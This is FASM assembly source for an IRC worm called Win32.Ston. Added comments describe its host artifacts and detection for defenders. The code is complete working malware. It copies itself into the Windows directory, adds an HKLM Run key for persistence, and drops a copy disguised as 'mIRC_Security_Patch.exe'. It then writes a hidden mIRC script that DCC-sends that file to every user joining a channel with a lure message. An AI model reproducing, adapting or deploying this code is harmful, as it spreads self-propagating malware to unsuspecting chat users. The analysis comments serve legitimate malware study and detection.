;--------------------------------------------------------------------+
;name: Win32.Ston                                                    |
;author: Hutley / RRLF                                               |
;date 30.Jun.2006                                                    |
;webpage: www.Hutley.de.vu                                           |
;--------------------------------------------------------------------+
; *** FEATURES                                                       |
; - Start with Windows by Registry                                   |
; - Spread by mIRC using a script file                               |
;                                                                    |
; *** THANX                                                          |
; - DiA, SPTH, blueowl, dr3f                                         |
;                                                                    |
; *** COMMENT!                                                       |
; My first that spread by mIRC!                                      |
;--------------------------------------------------------------------+

;---------------------------------------------------------------------
; ANALYSIS NOTES (defender view; every value is taken from this listing)
;
; Syntax : flat assembler (FASM) with the win32ax.inc macro set
;          (.data / .code / .end, invoke, proc / endp).
; Flow   : start -> autostart -> infect_mirc -> write_mirc.ini
;          -> ExitProcess(0). The process exits after these three
;          calls; later activity comes from the Run value and from
;          the script that mIRC is configured to load.
;
; Host artifacts to look for:
;   * <Windows dir>\WinStone.exe               copy of the sample
;   * HKLM\Software\Microsoft\Windows\CurrentVersion\Run
;       value "Ston" (REG_SZ) = path of WinStone.exe
;   * <mIRC dir>\mIRC_Security_Patch.exe       copy of the sample
;   * <mIRC dir>\ston.mrc, created with FILE_ATTRIBUTE_HIDDEN; its
;       first line is "; Win32.Ston.Script by Hutley/RRLF"
;   * <mIRC dir>\mirc.ini, section [rfiles], key n2 = ston.mrc
;       (an existing n2 value is replaced, so a previously loaded
;       script entry may be missing afterwards)
;   * marker string "Win32.Ston by Hutley / RRLF" in the binary
;
; Behaviour seen by other IRC users: on a channel JOIN event the
;   dropped script issues ".dcc send" of mIRC_Security_Patch.exe to
;   the joining nick, followed by the private message
;   "Accept, its a very nice one!". Refusing unsolicited DCC
;   transfers of executables on the client closes this path.
;
; Triage : <mIRC dir> is derived from the UninstallString value under
;   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC.
;   If that key cannot be opened, infect_mirc returns early, but
;   start still calls write_mirc.ini; ini_file is then only
;   "\mirc.ini", so a stray mirc.ini outside the mIRC directory is
;   worth checking for (exact location depends on how the API
;   resolves that path - confirm on the affected host).
;   Apart from the two checks in infect_mirc, no API return value is
;   tested, so any subset of the artifacts above may be present.
;---------------------------------------------------------------------

include '%fasminc%\win32ax.inc'

.data
        ; marker string; not referenced by any code in this listing
        about           db "Win32.Ston by Hutley / RRLF", 0
        _windir         rb 255d         ; filled by GetWindowsDirectory
        ston_file       rb 255d         ; path of the running module
        ston_new        rb 255d         ; destination path being built

        ; registry variables
        ; persistence location: Run key under HKEY_LOCAL_MACHINE
        reg_subkey      equ "Software\Microsoft\Windows\CurrentVersion\Run", 0
        reg_result      db ?            ; receives the key handle from RegOpenKeyEx
        reg_value       equ "Ston", 0   ; name of the Run value

        ; infect mIRC
        ; key used to locate the mIRC installation
        mirc_reg        equ "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC", 0
        mirc_reg_rst    db ?            ; receives the key handle from RegOpenKeyEx
        mirc_path       rb 255d         ; receives the UninstallString data
        mirc_size       db 255d         ; passed to RegQueryValueEx as the size argument
        mirc_file       equ "\mIRC_Security_Patch.exe", 0 ; name of the copy dropped next to mIRC
        mirc_ston       equ "ston.mrc", 0                 ; name of the dropped script
        mirc_ston_hdl   dd ?            ; file handle of ston.mrc
        ; not referenced below; infect_mirc uses an identical literal instead
        mirc_dccsend    db ".dcc send -clm $nick ",0
        ; first part of the script file written to ston.mrc
        mirc_content    db "; Win32.Ston.Script by Hutley/RRLF",13,10,\
                           "",13,10,\
                           "on 1:JOIN:#:if ($nick != $me) }",13,10
        mirc_ctnt_size  = $ - mirc_content
        ; middle part: ".dcc send ..." line, built at run time in infect_mirc
        mirc_other      db 256 dup(?)
        ; last part of the script file
        mirc_rest       db 13,10,".privmsg $nick Accept, its a very nice one!",13,10,"}"
        mirc_writen     dd 0            ; bytes-written output of WriteFile

        ;mirc.ini
        ; receives the mIRC directory (lstrcpy in infect_mirc), then
        ; "\mirc.ini" is appended in write_mirc.ini
        ini_file        db 0

.code
; Entry point: runs the three stages in order, then exits with code 0.
start:
        call    autostart               ; ok! auto start with windows
        call    infect_mirc             ; ok! copy in mirc folder
        call    write_mirc.ini          ; write in mirc.ini

        invoke  ExitProcess,\           ; that's all folks!
                0
.end start

;---------------------------------------------------------------------
; write_mirc.ini
; Appends "\mirc.ini" to ini_file and sets n2=ston.mrc in the [rfiles]
; section of that file via WritePrivateProfileString.
; Presumably [rfiles] is the list of script files mIRC loads - verify
; against the mIRC version on the affected host.
; Artifact: mirc.ini, [rfiles] n2=ston.mrc.
;---------------------------------------------------------------------
proc write_mirc.ini
        invoke  lstrcat,\
                ini_file,\
                "\mirc.ini"

        invoke  WritePrivateProfileString,\
                "rfiles",\
                "n2",\
                "ston.mrc",\
                ini_file
        ret
endp

;---------------------------------------------------------------------
; infect_mirc
; Locates the mIRC directory through the Uninstall registry key,
; copies the running module there as mIRC_Security_Patch.exe and
; writes the hidden script file ston.mrc in the same directory.
; Returns early (through the error label) when the registry key cannot
; be opened or when ston.mrc cannot be created.
; Artifacts: <mIRC dir>\mIRC_Security_Patch.exe, <mIRC dir>\ston.mrc.
;---------------------------------------------------------------------
proc infect_mirc
        invoke  RegOpenKeyEx,\
                HKEY_LOCAL_MACHINE,\
                mirc_reg,\
                0,\
                KEY_READ,\
                mirc_reg_rst

        cmp     eax, 0                  ; any error?
        jne     error                   ; then exit
        ; without error, then continue

        invoke  RegQueryValueEx,\
                dword[mirc_reg_rst],\
                "UninstallString",\
                0,\
                0,\
                mirc_path,\
                mirc_size

        ; Cut the last 21 characters off the UninstallString and skip its
        ; first character (presumably an opening quote - confirm against a
        ; real UninstallString); esi then points at the directory text.
        invoke  lstrlen,\
                mirc_path
        mov     esi, mirc_path
        sub     eax, 21                 ; 12 to mirc.exe | 21 to C:\mirc\
        mov     byte [esi + eax], 0
        inc     esi

        invoke  RegCloseKey,\
                mirc_reg_rst

        invoke  GetModuleFileName,\
                0,\
                ston_file,\
                255d

        ; ston_new and ini_file both start from the mIRC directory
        invoke  lstrcpy,\
                ston_new,\
                esi

        invoke  lstrcpy,\
                ini_file,\
                esi

        ; ston_new = <mIRC dir>\mIRC_Security_Patch.exe
        invoke  lstrcat,\
                ston_new,\
                mirc_file

        ; mirc_other = ".dcc send -clm $nick <mIRC dir>\mIRC_Security_Patch.exe"
        invoke  lstrcpy,\
                mirc_other,\
                ".dcc send -clm $nick "

        invoke  lstrcat,\
                mirc_other,\
                esi

        invoke  lstrcat,\
                mirc_other,\
                mirc_file

        ; FALSE = an existing file of that name is overwritten
        invoke  CopyFile,\              ; let's copy in mIRC folder
                ston_file,\
                ston_new,\
                FALSE

        ; Cut ston_new back by 23 characters (the file name appended above
        ; is 24 long, so its leading backslash stays) and append "ston.mrc".
        invoke  lstrlen,\
                ston_new
        mov     esi, ston_new
        sub     eax, 23
        mov     byte[esi + eax], 0

        invoke  lstrcat,\
                esi,\
                mirc_ston

        ; CREATE_ALWAYS replaces an existing ston.mrc; the file is hidden
        invoke  CreateFile,\            ; create the script file (ston.mrc)
                esi,\
                GENERIC_WRITE,\
                0,\
                0,\
                CREATE_ALWAYS,\
                FILE_ATTRIBUTE_HIDDEN,\
                0

        cmp     eax, INVALID_HANDLE_VALUE ; protection of errors
        je      error                   ; error? get out!

        mov     dword[mirc_ston_hdl], eax ; handle of file creation in variable

        ; The script is written in three pieces: fixed header, the
        ; run-time ".dcc send" line, fixed trailer.
        invoke  WriteFile,\
                dword[mirc_ston_hdl],\
                mirc_content,\
                mirc_ctnt_size,\
                mirc_writen,\
                0

        invoke  lstrlen,\
                mirc_other

        invoke  WriteFile,\
                dword[mirc_ston_hdl],\
                mirc_other,\
                eax,\
                mirc_writen,\
                0

        invoke  lstrlen,\
                mirc_rest

        invoke  WriteFile,\
                dword[mirc_ston_hdl],\
                mirc_rest,\
                eax,\
                mirc_writen,\
                0

        invoke  CloseHandle,\
                dword[mirc_ston_hdl]

error:                                  ; if exist error i go to here
        ; also reached by fall-through on the success path
        invoke  RegCloseKey,\           ; close the opened key
                mirc_reg_rst
        ret
endp

;---------------------------------------------------------------------
; autostart
; Copies the running module to <Windows dir>\WinStone.exe and stores
; that path as REG_SZ value "Ston" under the HKLM Run key.
; No return value is checked in this procedure.
; Artifacts: <Windows dir>\WinStone.exe, Run value "Ston".
; Detection: a write to the HKLM Run key by a process that has just
; copied itself into the Windows directory.
;---------------------------------------------------------------------
proc autostart                          ; auto start the virus by win registry
        invoke  GetWindowsDirectory,\   ; let's copy to windows dir
                _windir,\
                255d

        invoke  GetModuleFileName,\
                0,\
                ston_file,\
                255d

        ; ston_new = <Windows dir>\WinStone.exe
        invoke  lstrcpy,\
                ston_new,\
                _windir

        invoke  lstrcat,\
                ston_new,\
                "\WinStone.exe"

        ; FALSE = an existing WinStone.exe is overwritten
        invoke  CopyFile,\
                ston_file,\
                ston_new,\
                FALSE

        ; from here on ston_file holds the path of the copy
        invoke  lstrcpy,\
                ston_file,\
                ston_new

        invoke  RegOpenKeyEx,\          ; add to registry
                HKEY_LOCAL_MACHINE,\
                reg_subkey,\
                0,\
                KEY_SET_VALUE,\
                reg_result

        ; eax = length of the path, used as the data size below
        invoke  lstrlen,\
                ston_file

        invoke  RegSetValueEx,\
                dword[reg_result],\
                reg_value,\
                0,\
                REG_SZ,\
                ston_file,\
                eax

        invoke  RegCloseKey,\
                dword[reg_result]
        ret
endp